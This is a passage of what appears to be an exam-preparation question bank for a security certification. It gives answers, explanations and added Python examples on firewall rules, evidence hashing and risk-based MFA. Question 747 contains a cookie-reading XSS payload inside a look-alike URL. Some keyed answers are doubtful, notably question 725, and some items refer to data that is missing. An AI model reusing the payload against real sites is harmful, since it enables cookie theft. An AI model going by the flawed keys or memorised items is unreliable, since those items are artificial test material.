disruptions at both locations. Every day each location experiences very brief outages that last for
a few seconds. However, during the summer a high risk of intentional brownouts that last up to an
hour exists, particularly at one of the locations near an industrial smelter. Which of the following is
the BEST solution to reduce the risk of data loss?
A. Dual supply
B. Generator
C. UPS
D. PDU
E. Daily backups
Answer: C
Explanation:
A UPS is always required to protect against any interruption to computer services. A backup
generator cannot be brought online fast enough to respond to a brief power failure.
QUESTION 716
Several universities are participating in a collaborative research project and need to share
compute and storage resources.
Which of the following cloud deployment strategies would BEST meet this need?
A. Community
B. Private
C. Public
D. Hybrid
Answer: A
QUESTION 717
An organization has activated an incident response plan due to a malware outbreak on its
network. The organization has brought in a forensics team that has identified an internet-facing
Windows server as the likely point of initial compromise. The malware family that was detected is
known to be distributed by manually logging on to servers and running the malicious code. Which
of the following actions would be BEST to prevent reinfection from the infection vector?
A. Prevent connections over TFTP from the internal network.
B. Create a firewall rule that blocks port 22 from the internet to the server.
C. Disable file sharing over port 445 to the server.
D. Block port 3389 inbound from untrusted networks.
Answer: D
Explanation:
3389 is the default port for RDP connections. RDP is the protocol used to connect to Windows
desktops/servers remotely. In the scenario, the malware family is known to be distributed by
manually logging on to servers; RDP provides exactly that kind of manual, interactive login to the machine and
makes it easy to run scripts on the server, especially through a GUI.
QUESTION 718
A Chief Security Officer (CSO) is concerned that cloud-based services are not adequately
protected from advanced threats and malware. The CSO believes there is a high risk that a data
breach could occur in the near future due to the lack of detective and preventive controls. Which
of the following should be implemented to BEST address the CSO's concerns? (Choose two.)
A. A WAF
B. A CASB
C. An NG-SWG
D. Segmentation
E. Encryption
F. Containerization
Answer: BC
Explanation:
NG-SWG - A next-generation secure web gateway is designed to address the key cloud and web security use cases,
encompassing granular policy controls, web filtering, threat protection, and data protection
spanning managed and unmanaged apps, cloud services, and web traffic.
CASB - The CASB serves as a policy enforcement center, consolidating multiple types of security
policy enforcement and applying them to everything your business utilizes in the cloud, regardless of
what sort of device is attempting to access it, including unmanaged smartphones,
IoT devices, or personal laptops.
QUESTION 719
Field workers in an organization are issued mobile phones on a daily basis. All the work is
performed within one city, and the mobile phones are not used for any purpose other than work.
The organization does not want these phones used for personal purposes. The organization
would like to issue the phones to workers as permanent devices so the phones do not need to be
reissued every day. Given the conditions described, which of the following technologies would
BEST meet these requirements?
A. Geofencing
B. Mobile device management
C. Containerization
D. Remote wiping
Answer: B
Explanation:
MDM is the best solution here. The company wants to issue a COBO (corporate-owned, business-only) device, so
containerization, which is tailored to BYOD, is not needed.
Geofencing and remote wiping are capabilities that are provided by an MDM solution.
QUESTION 720
During a recent incident an external attacker was able to exploit an SMB vulnerability over the
internet.
Which of the following action items should a security analyst perform FIRST to prevent this from
occurring again?
A. Check for any recent SMB CVEs
B. Install AV on the affected server
C. Block unneeded TCP 445 connections
D. Deploy a NIDS in the affected subnet
Answer: C
Explanation:
Blocking unneeded TCP 445 connections should be performed FIRST as it would prevent the
SMB vulnerability from being used.
QUESTION 721
Business partners are working on a security mechanism to validate transactions securely. The
requirement is for one company to be responsible for deploying a trusted solution that will register
and issue artifacts used to sign, encrypt, and decrypt transaction files. Which of the following is
the BEST solution to adopt?
A. PKI
B. Blockchain
C. SAML
D. OAuth
Answer: A
Explanation:
PKI relies on a single trusted third party (the certificate authority), which here is the company responsible for registering and issuing the artifacts.
Blockchain, by contrast, is a decentralized or distributed system with no single trusted issuer.
QUESTION 722
An organization wants to participate in threat intelligence information sharing with peer groups.
Which of the following would MOST likely meet the organization's requirement?
A. Perform OSINT investigations
B. Subscribe to threat intelligence feeds
C. Submit RFCs
D. Implement a TAXII server
Answer: D
Explanation:
A TAXII server exchanges standardized and anonymized cyber threat intelligence
among participants. It works as a venue for sharing and collecting indicators of compromise, which
have been anonymized to protect privacy.
QUESTION 723
An organization has developed an application that needs a patch to fix a critical vulnerability.
In which of the following environments should the patch be deployed LAST?
A. Test
B. Staging
C. Development
D. Production
Answer: D
Explanation:
The production environment is the live system. Software, patches, and other changes that have
been tested and approved move to production.
QUESTION 724
Which of the following risk management strategies would an organization use to maintain a
legacy system with known risks for operational purposes?
A. Acceptance
B. Transference
C. Avoidance
D. Mitigation
Answer: A
Explanation:
Accepting risk, or risk acceptance, occurs when a business or individual acknowledges that the
potential loss from a risk is not great enough to warrant spending money to avoid it.
QUESTION 725
A social media company based in North America is looking to expand into new global markets
and needs to maintain compliance with international standards.
With which of the following is the company's data protection officer MOST likely concerned?
A. NIST Framework
B. ISO 27001
C. GDPR
D. PCI-DSS
Answer: B
Explanation:
NIST is considered best for organizations that are in the early stages of developing a risk
management plan. ISO 27001, comparatively, is better for operationally mature organizations.
QUESTION 726
Several users have opened tickets with the help desk. The help desk has reassigned the tickets
to a security analyst for further review.
The security analyst reviews the following metrics:
Which of the following is MOST likely the result of the security analyst's review?
A. The ISP is dropping outbound connections
B. The user of the Sales-PC fell for a phishing attack
C. Corporate PCs have been turned into a botnet
D. An on-path attack is taking place between PCs and the router
Answer: C
QUESTION 727
A security analyst wants to fingerprint a web server. Which of the following tools will the security
analyst MOST likely use to accomplish this task?
A. nmap -p1-65535 192.168.0.10
B. dig 192.168.0.10
C. curl --head http://192.168.0.10
D. ping 192.168.0.10
Answer: C
Explanation:
curl --head sends an HTTP HEAD request, which is similar to a GET request. Remember from your studies that GET is
when a user/entity requests a resource from a server across the internet, and the
response to a GET includes both headers and a body. By doing curl --head, you are asking the
server for the same information, but the server replies with only the response headers rather than including
the body. Therefore curl --head is a way to send header-only requests. This
gives a quick summary of the responding server (for example, its Server header), or in this case, a view of its fingerprint.
QUESTION 728
A security analyst is working on a project to implement a solution that monitors network
communications and provides alerts when abnormal behavior is detected.
Which of the following is the security analyst MOST likely implementing?
A. Vulnerability scans
B. User behavior analysis
C. Security orchestration, automation, and response
D. Threat hunting
Answer: B
Explanation:
User behavior analysis (UBA, listed under Syslog/SIEM in the exam objectives) builds a baseline
of normal activity from network and log data and raises an alert when behavior deviates from that
baseline. Vulnerability scans look for known weaknesses rather than live traffic, threat hunting is
a manual, hypothesis-driven search, and SOAR acts on alerts that other tools have already raised
rather than generating them.
QUESTION 729
Which of the following provides a calculated value for known vulnerabilities so organizations can
prioritize mitigation steps?
A. CVSS
B. SIEM
C. SOAR
D. CVE
Answer: A
Explanation:
The Common Vulnerability Scoring System (CVSS) is maintained by the Forum of Incident
Response and Security Teams (first.org/cvss). Its metrics produce a score from 0.0 to 10.0 based
on characteristics of the vulnerability, such as whether it can be exploited remotely or needs local
access, whether user interaction is required, and the impact on confidentiality, integrity, and
availability. CVE only assigns an identifier to a vulnerability; the CVSS score is what allows
mitigation work to be prioritized.
QUESTION 730
A Chief Information Security Officer has defined resiliency requirements for a new data center
architecture.
The requirements are as follows:
- Critical fileshares will remain accessible during and after a natural disaster
- Five percent of hard disks can fail at any given time without impacting the data.
- Systems will be forced to shut down gracefully when battery levels are below 20%
Which of the following are required to BEST meet these objectives? (Select THREE)
A. Fiber switching
B. IaC
C. NAS
D. RAID
E. UPS
F. Redundant power supplies
G. Geographic dispersal
H. Snapshots
I. Load balancing
Answer: DEG
Explanation:
RAID tolerates the loss of a share of the disks without losing data, a UPS can signal the operating
system to shut down gracefully when its battery drops below a threshold, and geographic
dispersal keeps the critical file shares reachable from another site during and after a natural
disaster.
QUESTION 731
An administrator is configuring a firewall rule set for a subnet to only access DHCP, web pages,
and SFTP, and to specifically block FTP.
Which of the following would BEST accomplish this goal?
A. [Permission Source Destination Port]
Allow: Any Any 80
Allow: Any Any 443
Allow: Any Any 67
Allow: Any Any 68
Allow: Any Any 22
Deny: Any Any 21
Deny: Any Any
B. [Permission Source Destination Port]
Allow: Any Any 80
Allow: Any Any 443
Allow: Any Any 67
Allow: Any Any 68
Deny: Any Any 22
Allow: Any Any 21
Deny: Any Any
C. [Permission Source Destination Port]
Allow: Any Any 80
Allow: Any Any 443
Allow: Any Any 22
Deny: Any Any 67
Deny: Any Any 68
Deny: Any Any 21
Allow: Any Any
D. [Permission Source Destination Port]
Allow: Any Any 80
Allow: Any Any 443
Deny: Any Any 67
Allow: Any Any 68
Allow: Any Any 22
Allow: Any Any 21
Allow: Any Any
Answer: A
Explanation:
DHCP uses UDP ports 67 (server) and 68 (client), SFTP runs over SSH on TCP port 22, web pages
use TCP 80 (HTTP) and 443 (HTTPS), and FTP control traffic uses TCP 21. Rule sets are evaluated
top-down with the first match winning, so option A allows exactly the required services, explicitly
denies 21, and ends with a deny-all. Option B denies 22 (blocking SFTP) and allows 21, and
options C and D end with an allow-all, which defeats the goal of restricting the subnet.
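As an added example (not part of the original exam guide), the following Python script evaluates the four rule sets above with first-match semantics against the ports the policy names. The packet ports tested and the use of port 3389 as a stand-in for "any other service" are assumptions made here.

```python
# Added example (not from the exam guide): first-match evaluation of the
# firewall rule sets in Question 731, to show why option A is the correct one.
# The rule tables are transcribed from the options; the test ports are constructed.

RULESET_A = [
    ("allow", 80), ("allow", 443), ("allow", 67), ("allow", 68),
    ("allow", 22), ("deny", 21), ("deny", None),   # None = any port
]
RULESET_B = [
    ("allow", 80), ("allow", 443), ("allow", 67), ("allow", 68),
    ("deny", 22), ("allow", 21), ("deny", None),
]
RULESET_C = [
    ("allow", 80), ("allow", 443), ("allow", 22),
    ("deny", 67), ("deny", 68), ("deny", 21), ("allow", None),
]
RULESET_D = [
    ("allow", 80), ("allow", 443), ("deny", 67),
    ("allow", 68), ("allow", 22), ("allow", 21), ("allow", None),
]

def evaluate(ruleset, dport):
    """Return 'allow' or 'deny' for a packet with destination port dport.
    Rules are checked top-down; the first rule whose port matches wins,
    which is how most packet filters behave."""
    for action, port in ruleset:
        if port is None or port == dport:
            return action
    # Most real firewalls apply an implicit deny when no rule matches.
    return "deny"

# Policy: DHCP (67/68), web (80/443) and SFTP (22) must be allowed,
# FTP (21) must be blocked and everything else should be dropped.
REQUIRED = {67: "allow", 68: "allow", 80: "allow", 443: "allow", 22: "allow",
            21: "deny", 3389: "deny"}  # 3389 stands in for "any other port" (assumption)

def meets_requirements(ruleset):
    """True when the rule set produces the wanted verdict for every policy port."""
    return all(evaluate(ruleset, p) == want for p, want in REQUIRED.items())

def failures(ruleset):
    """List the (port, got, wanted) tuples where a rule set breaks the policy."""
    return [(p, evaluate(ruleset, p), want)
            for p, want in REQUIRED.items() if evaluate(ruleset, p) != want]

if __name__ == "__main__":
    for name, rs in [("A", RULESET_A), ("B", RULESET_B), ("C", RULESET_C), ("D", RULESET_D)]:
        print(name, "OK" if meets_requirements(rs) else failures(rs))
```

Running it prints `A OK` and, for the other three, the exact ports on which they violate the policy, which is the check to run before pushing any rule change to a firewall.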
QUESTION 732
A forensic analyst needs to prove that data has not been tampered with since it was collected.
Which of the following methods will the analyst MOST likely use?
A. Look for tampering on the evidence collection bag
B. Encrypt the collected data using asymmetric encryption
C. Ensure proper procedures for chain of custody are being followed
D. Calculate the checksum using a hashing algorithm
Answer: D
Explanation:
A cryptographic hash (for example SHA-256) of the evidence is computed at collection time and
recorded. Recomputing the hash later and comparing it with the recorded value proves that not a
single byte has changed: any modification, however small, produces a different digest. Chain of
custody documents who handled the evidence but does not by itself prove the contents are
unchanged, and encryption protects confidentiality rather than integrity.
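The collect-record-verify cycle described above, as an added example that is not part of the original exam guide. The evidence file is constructed in a temporary directory; on a real case the same functions would be pointed at the disk image.

```python
# Added example (not from the exam guide): recording a SHA-256 digest of
# collected evidence and later verifying it. The evidence bytes are
# constructed here; on a real case you would hash the acquired disk image.
import hashlib
import hmac
import os
import tempfile

def hash_file(path, algorithm="sha256", chunk_size=1 << 20):
    """Return the hex digest of a file, reading it in chunks so that
    multi-gigabyte disk images do not have to fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_file(path, expected_hex, algorithm="sha256"):
    """True if the file still matches the digest recorded at collection time.
    hmac.compare_digest keeps the comparison time independent of where
    the digests differ."""
    return hmac.compare_digest(hash_file(path, algorithm), expected_hex.lower())

def demo():
    """Collect, record, tamper, re-verify. Returns (intact, tampered) verdicts."""
    with tempfile.TemporaryDirectory() as d:
        image = os.path.join(d, "evidence.img")
        with open(image, "wb") as f:
            f.write(b"constructed evidence image contents\n" * 1000)
        recorded = hash_file(image)          # value written into the evidence log
        intact = verify_file(image, recorded)
        # Flip a single bit somewhere in the middle of the image.
        with open(image, "r+b") as f:
            f.seek(5000)
            b = f.read(1)
            f.seek(5000)
            f.write(bytes([b[0] ^ 0x01]))
        tampered = verify_file(image, recorded)
        return intact, tampered

if __name__ == "__main__":
    print(demo())
```

The recorded digest only has evidentiary value if it is stored somewhere the evidence handler cannot silently change, such as the signed chain-of-custody form; the same comparison is what users do when a vendor publishes file hashes next to a download.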
QUESTION 733
A systems administrator reports degraded performance on a virtual server. The administrator
increases the virtual memory allocation which improves conditions, but performance degrades
again after a few days. The administrator runs an analysis tool and sees the following output:
==3214== timeAttend.exe analyzed
==3214== ERROR SUMMARY:
==3214== malloc/free: in use at exit: 4608 bytes in 18 blocks.
==3214== checked 82116 bytes
==3214== definitely lost: 4608 bytes in 18 blocks.
The administrator terminates timeAttend.exe, observes system performance over the next few
days, and notices that the system performance does not degrade.
Which of the following issues is MOST likely occurring?
A. DLL injection
B. API attack
C. Buffer overflow
D. Memory leak
Answer: D
Explanation:
A memory leak occurs when a program allocates memory on the heap and never frees it. The
analysis output (in the style of a valgrind leak summary) shows 4608 bytes in 18 blocks that were
still allocated when the process exited and are "definitely lost", meaning no pointer to them
remained. Each run of the leaking code path consumes a little more memory, so available memory
shrinks and performance degrades slowly until the process is terminated, which is exactly the
pattern the administrator observed. Adding virtual memory only delays the symptom. The other
options describe attacks rather than a resource-handling bug.
QUESTION 734
An enterprise has hired an outside security firm to conduct penetration testing on its network and
applications. The firm has been given all the developer's documentation about the internal
architecture. Which of the following BEST represents the type of testing that will occur?
A. Bug bounty
B. Black-box
C. Gray-box
D. White-box
Answer: D
Explanation:
In white-box testing the internal structure (code, architecture, configuration) is fully known to
the tester; in black-box testing it is unknown; in gray-box testing it is partially known. White-box
penetration testing, sometimes called crystal-box or clear-box testing, involves sharing full
network and system information with the testers, including architecture documentation, network
maps, and often credentials. This saves reconnaissance time and lets the testers focus on deeper
logic flaws, which reduces the overall cost of an engagement.
QUESTION 735
An organization has decided to purchase an insurance policy because a risk assessment
determined that the cost to remediate the risk is greater than the five-year cost of the insurance
policy. The organization is enabling risk:
A. avoidance
B. acceptance
C. mitigation
D. transference
Answer: D
Explanation:
Buying insurance transfers the financial impact of the risk to a third party rather than removing,
reducing, or simply accepting it.
QUESTION 736
Which of the following is the GREATEST security concern when outsourcing code development
to third-party contractors for an internet-facing application?
A. Intellectual property theft
B. Elevated privileges
C. Unknown backdoor
D. Quality assurance
Answer: C
Explanation:
Outsourced code for an internet-facing application could contain a hidden backdoor that the
contractor (or someone who compromised the contractor) can use to reach the production system
from the internet, which is the greatest security concern. Intellectual property theft and quality
assurance are business risks, and elevated privileges is a consequence a backdoor might provide
rather than the root concern.
QUESTION 737
A company is auditing the manner in which its European customers' personal information is
handled.
Which of the following should the company consult?
A. GDPR
B. ISO
C. NIST
D. PCI DSS
Answer: A
Explanation:
GDPR (General Data Protection Regulation) - An EU regulation that requires businesses to
protect the personal data and privacy of people in the EU, regardless of where the business itself
is located.
ISO (International Organization for Standardization) - An independent, non-governmental
organization that develops standards to ensure the quality, safety and efficiency of products,
services and systems.
NIST (National Institute of Standards and Technology) - A non-regulatory US government agency
that develops cybersecurity standards, guidelines, best practices, and other resources to meet
the needs of U.S. industry, federal agencies and the broader public.
PCI DSS (Payment Card Industry Data Security Standard) - A set of security standards for
organizations that handle credit cards from the major card schemes.
QUESTION 738
A security analyst is designing the appropriate controls to limit unauthorized access to a physical
site. The analyst has a directive to utilize the lowest possible budget. Which of the following would
BEST meet the requirements?
A. Preventive controls
B. Compensating controls
C. Deterrent controls
D. Detective controls
Answer: C
Explanation:
Deterrent controls (warning signs, visible cameras, lighting) are designed to discourage casual
intruders and unmotivated attackers from attempting to enter the site, and they are generally the
cheapest controls to put in place. Preventive and detective physical controls such as locks,
guards, and alarm systems cost more to deploy and operate.
QUESTION 739
An administrator needs to protect user passwords and has been advised to hash the passwords.
Which of the following BEST describes what the administrator is being advised to do?
A. Perform a mathematical operation on the passwords that will convert them into unique strings.
B. Add extra data to the passwords so their length is increased, making them harder to brute
force.
C. Store all passwords in the system in a rainbow table that has a centralized location.
D. Enforce the use of one-time passwords that are changed for every login session.
Answer: A
Explanation:
Explanation:
Hashing applies a one-way mathematical function to the password and stores only the resulting
fixed-length digest. The same input always produces the same digest, so a login attempt can be
verified by hashing the supplied password and comparing, but the digest cannot be reversed to
recover the password. Option B describes salting or padding, not hashing; storing passwords in a
rainbow table (C) would be the opposite of protecting them; and one-time passwords (D) are an
authentication method, not a storage protection.
QUESTION 740
Which of the following would BEST provide a systems administrator with the ability to more
efficiently identify systems and manage permissions and policies based on location, role, and
service level?
A. Standard naming conventions
B. Domain services
C. Baseline configurations
D. Diagrams
Answer: A
Explanation:
A standard naming convention for hardware assets, and for digital assets such as accounts and
virtual machines, makes the environment more consistent. Errors are easier to spot, and
automation through scripting becomes easier because a hypothetical name such as
NYC-WEB-PROD-01 can be parsed for location, role, and service level. The naming strategy should
allow administrators to identify the type and function of any particular resource or location at
any point in the CMDB or network directory, and each label should conform to the rules for host
and DNS names.
Domain services - Services that store centralized directory information and let users and
domains communicate. When a user attempts to connect to a device or resource on a network,
this service provides login authentication, verifying the user's credentials and access
permissions.
Baseline configuration - A documented set of specifications for an information system, or a
configuration item within a system, that has been formally reviewed and agreed on at a given
point in time, and which can be changed only through change control procedures.
QUESTION 741
During an incident response, an analyst applied rules to all inbound traffic on the border firewall
and implemented ACLs on each critical server. Following an investigation, the company realizes it
is still vulnerable because outbound traffic is not restricted, and the adversary is able to maintain
a presence in the network.
In which of the following stages of the Cyber Kill Chain is the adversary currently operating?
A. Reconnaissance
B. Command and control
C. Actions on objective
D. Exploitation
Answer: B
Explanation:
Command and control (C2) is the stage in which the adversary establishes outbound
communications from a victim system back to attacker-controlled infrastructure. Compromised
hosts typically beacon out and await further instructions, which is the hallmark of advanced
persistent threat (APT) activity and the channel used for data exfiltration. Because only inbound
traffic was restricted, those outbound beacons still succeed and the adversary keeps a foothold.
Restricting and monitoring egress traffic (outbound filtering, proxying, DNS logging) is what
breaks this stage.
QUESTION 742
Which of the following terms describes a broad range of information that is sensitive to a specific
organization?
A. Public
B. Top secret
C. Proprietary
D. Open-source
Answer: C
Explanation:
Proprietary information is data that is the property of an organization and that the organization
wishes to keep confidential. It is often unique to the organization and may include trade secrets.
QUESTION 743
A company suspects that some corporate accounts were compromised. The number of
suspicious logins from locations not recognized by the users is increasing.
Employees who travel need their accounts protected without the risk of blocking legitimate login
requests that may be made over new sign-in properties. Which of the following security controls
can be implemented?
A. Enforce MFA when an account request reaches a risk threshold.
B. Implement geofencing to only allow access from headquarters
C. Enforce time-based login requests that align with business hours
D. Shift the access control scheme to a discretionary access control
Answer: A
Explanation:
Risk-based (conditional) MFA is the only option that protects the accounts without blocking
legitimate logins from new locations or devices: a sign-in from an unfamiliar property raises the
risk score, and the user is prompted for an additional factor instead of being denied outright. An
attacker holding only the password cannot satisfy the extra factor.
(B) Geofencing to headquarters would stop the suspicious logins but would also lock out the
traveling employees the question specifically wants to keep working.
(C) Time-based restrictions would be just as inconvenient for traveling or global employees who
work outside the home office's business hours, and attackers can simply log in during business
hours.
(D) With discretionary access control the owner of a resource decides who can access it. Changing
the access control model does nothing about a compromised account, since the attacker is using
the legitimate user's credentials and inherits that user's permissions.
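The risk-based step-up decision of option A, as an added example that is not part of the original exam guide. The risk signals, their weights, the thresholds, and the per-user baseline are constructed here for illustration and are not a particular identity provider's scoring.

```python
# Added example (not from the exam guide): a simple risk-based step-up check in
# the spirit of option A. Per-user baselines, the scoring weights, and the
# sample login events are all constructed for illustration; real identity
# providers use far richer signals.
from dataclasses import dataclass, field

@dataclass
class Baseline:
    """What has been seen for this user in the recent past (constructed)."""
    countries: set = field(default_factory=set)
    devices: set = field(default_factory=set)
    asns: set = field(default_factory=set)

@dataclass
class Login:
    user: str
    country: str
    device_id: str
    asn: str
    impossible_travel: bool = False   # flagged by a separate geo-velocity check

WEIGHTS = {"new_country": 40, "new_device": 30, "new_network": 20,
           "impossible_travel": 60}          # assumed weights
MFA_THRESHOLD = 50     # score at which a second factor is required
BLOCK_THRESHOLD = 100  # score at which even MFA is not trusted

def score_login(login, baseline):
    """Return (score, reasons). Each unfamiliar sign-in property adds risk."""
    score, reasons = 0, []
    if login.country not in baseline.countries:
        score += WEIGHTS["new_country"]; reasons.append("new_country")
    if login.device_id not in baseline.devices:
        score += WEIGHTS["new_device"]; reasons.append("new_device")
    if login.asn not in baseline.asns:
        score += WEIGHTS["new_network"]; reasons.append("new_network")
    if login.impossible_travel:
        score += WEIGHTS["impossible_travel"]; reasons.append("impossible_travel")
    return score, reasons

def decide(login, baseline):
    """'allow' for familiar sign-ins, 'mfa' above the risk threshold,
    'block' when the score is too high to trust a second factor."""
    score, _ = score_login(login, baseline)
    if score >= BLOCK_THRESHOLD:
        return "block"
    if score >= MFA_THRESHOLD:
        return "mfa"
    return "allow"

def learn(login, baseline):
    """After a successful MFA the new properties join the baseline, so the
    traveling employee is not prompted again from the same hotel network."""
    baseline.countries.add(login.country)
    baseline.devices.add(login.device_id)
    baseline.asns.add(login.asn)

# Constructed sample data: alice normally works from the US office.
ALICE = Baseline(countries={"US"}, devices={"laptop-0a1b"}, asns={"AS64496"})

def demo_learning():
    """Decision for a travel login before and after a successful MFA."""
    b = Baseline(countries={"US"}, devices={"laptop-0a1b"}, asns={"AS64496"})
    travel = Login("alice", "DE", "laptop-0a1b", "AS64500")
    before = decide(travel, b)
    learn(travel, b)
    return before, decide(travel, b)

if __name__ == "__main__":
    usual = Login("alice", "US", "laptop-0a1b", "AS64496")
    travel = Login("alice", "DE", "laptop-0a1b", "AS64500")   # own laptop, hotel Wi-Fi
    attack = Login("alice", "BR", "unknown-9f", "AS64511", impossible_travel=True)
    for l in (usual, travel, attack):
        print(l.country, score_login(l, ALICE), decide(l, ALICE))
    print(demo_learning())
```

The traveling employee on a known laptop lands in the "mfa" band and is let through after the extra factor, while a login from an unknown device on a new network with impossible travel is blocked outright; the baseline update after a successful MFA is what keeps the prompts from becoming a nuisance.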
QUESTION 744
Which of the following would be indicative of a hidden audio file found inside of a piece of source
code?
A. Steganography
B. Homomorphic encryption
C. Cipher suite
D. Blockchain
Answer: A
Explanation:
Steganography is the technique of hiding secret data within an ordinary, non-secret file or
message in order to avoid detection: hiding in plain sight. The question refers to a hidden file,
not to a form of encryption. Steganography is not an encryption method, but it can be combined
with encryption so that the hidden payload is also unreadable if it is found.
Homomorphic encryption - An encryption scheme designed to allow calculations to be performed
on encrypted data without access to the secret key. The result remains encrypted and can later
be decrypted by the data owner, which allows sensitive data to be processed by third parties
without exposing it to them.
Cipher suite - The set of algorithms (key exchange, authentication, bulk encryption, and message
authentication) negotiated to establish a TLS (formerly SSL) connection between a client and a
server.
Blockchain - A shared, append-only ledger that records transactions and tracks assets across a
network of participants.
QUESTION 745
A software company adopted the following processes before releasing software to production:
- Peer review
- Static code scanning
- Signing
A considerable number of vulnerabilities are still being detected when code is executed in
production.
Which of the following security tools can improve vulnerability detection in this environment?
A. File integrity monitoring for the source code
B. Dynamic code analysis tool
C. Encrypted code repository
D. Endpoint detection and response solution
Answer: B
Explanation:
Peer review and static code scanning examine the source without running it, and code signing
only proves who produced the build; none of them can find defects that appear only at runtime
(input handling, race conditions, memory errors under real data, misconfiguration in the deployed
environment). A dynamic analysis tool (DAST, fuzzing, or interactive testing) exercises the
running application and is the control missing from this pipeline. File integrity monitoring, an
encrypted repository, and EDR protect the code and the endpoints but do not find vulnerabilities
in the application logic.
QUESTION 746
An organization is migrating several SaaS applications that support SSO. The security manager
wants to ensure the migration is completed securely. Which of the following application
integration aspects should the organization consider before focusing into underlying
implementation details? (Choose two.)
A. The back-end directory source
B. The identity federation protocol
C. The hashing method
D. The encryption method
E. The registration authority
F. The certificate authority
Answer: AB
Explanation:
Before looking at implementation details, the organization must decide where identities come
from (the back-end directory source, such as its on-premises or cloud directory) and how the
SaaS applications will federate with it (the identity federation protocol, such as SAML or OpenID
Connect). Hashing and encryption methods, the registration authority, and the certificate
authority are lower-level implementation details that follow from those two architectural
decisions.
QUESTION 747
A security analyst was asked to evaluate a potential attack that occurred on a publicly accessible
section of the company's website.
The malicious actor posted an entry in an attempt to trick users into clicking the following:
https://www.cOmptla.com/contactus/3Fname%3D%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E
Which of the following was MOST likely observed?
A. DLL injection
B. Session replay
C. SQLi
D. XSS
Answer: D
Explanation:
URL-decoding the query string gives ?name=<script>alert(document.cookie)</script>. A script
tag supplied in a parameter and reflected by the page is reflected cross-site scripting (XSS); the
look-alike domain with substituted characters is the lure to get users to click. SQL injection
would carry SQL syntax rather than HTML, and DLL injection and session replay are not delivered
through a link.
QUESTION 748
During an incident response process involving a laptop, a host was identified as the entry point
for malware. The management team would like to have the laptop restored and given back to the
user. The cybersecurity analyst would like to continue investigating the intrusion on the host.
Which of the following would allow the analyst to continue the investigation and also return the
laptop to the user as soon as possible?
A. dd
B. memdump
C. tcpdump
D. head
Answer: A
Explanation:
dd produces a bit-for-bit raw image of the laptop's disk. The image (with its hash recorded) can
be loaded into tools such as Autopsy or FTK and analyzed without any risk of altering the
original, so the laptop itself can be reimaged and returned to the user while the investigation
continues on the copy. memdump captures only volatile memory, tcpdump captures network
traffic, and head prints the beginning of a file.
QUESTION 749
A Chief Information Security Officer wants to ensure the organization is validating and checking
the integrity of zone transfers.
Which of the following solutions should be implemented?
A. DNSSEC
B. LDAPS
C. NGFW
D. DLP
Answer: A
Explanation:
A zone file is a text-based file with a format defined in RFC 1034 and RFC 1035 and is stored on
a DNS server (name server). Zone files contain the IP and name data, MX records and other
service records, as well as glue records that connect them to the other DNS servers. By default
many DNS servers permit any host to request and receive a full zone transfer (AXFR) for a
domain. This is a security issue because DNS data reveals the topology of a company's network,
and a tampered transfer can plant bogus records used for DNS poisoning or spoofing. It is like an
anonymous caller asking the receptionist for the entire company telephone and address book.
DNSSEC adds digital signatures (RRSIG records) to the zone data, so a secondary server or
resolver can validate that the records it received were signed by the zone owner and have not
been modified in transit. In practice, transfers between primary and secondary servers are also
commonly authenticated with TSIG keys. LDAPS secures directory queries, an NGFW filters
traffic, and DLP prevents data leakage; none of them validate DNS data.
QUESTION 750
To reduce and limit software and infrastructure costs, the Chief Information Officer has requested
to move email services to the cloud. The cloud provider and the organization must have security
controls to protect sensitive data.
Which of the following cloud services would BEST accommodate the request?
A. IaaS
B. PaaS
C. DaaS
D. SaaS
Answer: D
Explanation:
With SaaS the provider runs the complete application, so the organization pays nothing for mail
server software or infrastructure and only configures the service. Hosted email services such as
Gmail and Outlook.com (formerly Hotmail) are examples of cloud-based SaaS. The shared
responsibility model still applies: the provider secures the platform, while the organization
remains responsible for its users, data classification, and access controls.
QUESTION 751
An audit identified PII being utilized in the development environment of a critical application. The
Chief Privacy Officer (CPO) is adamant that this data must be removed; however, the developers
are concerned that without real data they cannot perform functionality tests and search for
specific data.
Which of the following should a security professional implement to BEST satisfy both the CPO's
and the development team's requirements?
A. Data anonymization
B. Data encryption
C. Data masking
D. Data tokenization
Answer: A
Explanation:
Data anonymization irreversibly alters the personally identifiable information in a dataset so
that individuals can no longer be identified, while preserving the structure and format of the
records. The developers keep realistic data to run functionality tests and searches, and the CPO's
requirement that real PII be removed from the development environment is satisfied. Encryption
and tokenization keep the real values recoverable, which the CPO would not accept.
QUESTION 752
Which of the following are the BEST ways to implement remote home access to a company's
intranet systems if establishing an always-on VPN is not an option? (Select Two)
A. Install VPN concentrators at home offices
B. Create NAT on the firewall for intranet systems
C. Establish SSH access to a jump server
D. Implement a SSO solution
E. Enable MFA for intranet systems
F. Configure SNMPv3 server and clients.
Answer: CE
Explanation:
A hardened jump server reached over SSH gives remote users a single, monitored entry point to
the intranet without an always-on VPN, and MFA on the intranet systems protects the accounts
used over that path. Putting VPN concentrators in employees' homes is neither practical nor what
the question asks for, NAT exposes internal systems directly to the internet, SSO improves
convenience rather than remote access security, and SNMPv3 is for device monitoring.
QUESTION 753
Which of the following control types fixes a previously identified issue and mitigates a risk?
A. Detective
B. Corrective
C. Preventative
D. Finalized
Answer: B
Explanation:
A corrective control acts after an incident or finding to fix the identified issue and restore the
system to a secure state; "finalized" is not a control type.
QUESTION 754
A security analyst has identified malware spreading through the corporate network and has
activated the CSIRT Which of the following should the analyst do NEXT?
A. Review how the malware was introduced to the network.
B. Attempt to quarantine all infected hosts to limit further spread.
C. Create help desk tickets to get infected systems reimaged.
D. Update all endpoint antivirus solutions with the latest updates.
Answer: B
Explanation:
As soon as the malware is identified, incident response begins. The steps of incident response
are:
1. Preparation - Preparing for an attack and how to respond
2. Identification - Identifying the threat
3. Containment - Containing the threat
4. Eradication - Removing the threat
5. Recovery - Recovering affected systems
6. Lessons learned - Evaluating the incident response and finding improvements for future
incidents
In the scenario the malware has already been identified, so the Identification step is complete.
The next step is containment, to limit the damage the malware can cause, so quarantining
infected hosts is the best option here. Reviewing how it got in (A) belongs to eradication and
lessons learned, and reimaging (C) is recovery.
QUESTION 755
A security analyst reviews web server logs and notices the following lines:
Which of the following vulnerabilities has the attacker exploited? (Choose two.)
A. Race condition
B. LFI
C. Pass the hash
D. XSS
E. RFI
F. Directory traversal
Answer: BF
Explanation:
LFI - Local File Inclusion is an attack technique in which attackers trick a web application into
including, and so running or exposing, files that already exist on the web server, typically by
